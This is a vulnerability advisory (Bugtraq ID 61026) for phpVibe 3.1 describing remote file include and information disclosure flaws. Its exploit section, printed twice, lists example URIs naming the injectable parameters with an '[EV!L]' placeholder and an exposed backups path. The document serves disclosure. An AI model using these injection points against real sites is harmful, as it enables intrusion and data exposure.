phpVibe Information Disclosure and Remote File Include Vulnerabilities
BID:61026
Info
phpVibe Information Disclosure and Remote File Include Vulnerabilities
| Bugtraq ID: | 61026 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 06 2013 12:00AM |
| Updated: | Jul 06 2013 12:00AM |
| Credit: | indoushka |
| Vulnerable: |
S.C. Media Vibe phpVibe 3.1 |
| Not Vulnerable: | |
Exploit / POC
phpVibe Information Disclosure and Remote File Include Vulnerabilities
An attacker can exploit these issues through a browser.
The following example URIs are available:
http://www.example.com/phpVibe/index.php?com_handler=[EV!L]
http://www.example.com/phpVibe/app/classes/language.php?LANGUAGE_DIR=[EV!L]
http://www.example.com/phpVibe/app/classes/language.php?lang=[EV!L]
http://www.example.com/setup/application/views/displays/modules/backups/
An attacker can exploit these issues through a browser.
The following example URIs are available:
http://www.example.com/phpVibe/index.php?com_handler=[EV!L]
http://www.example.com/phpVibe/app/classes/language.php?LANGUAGE_DIR=[EV!L]
http://www.example.com/phpVibe/app/classes/language.php?lang=[EV!L]
http://www.example.com/setup/application/views/displays/modules/backups/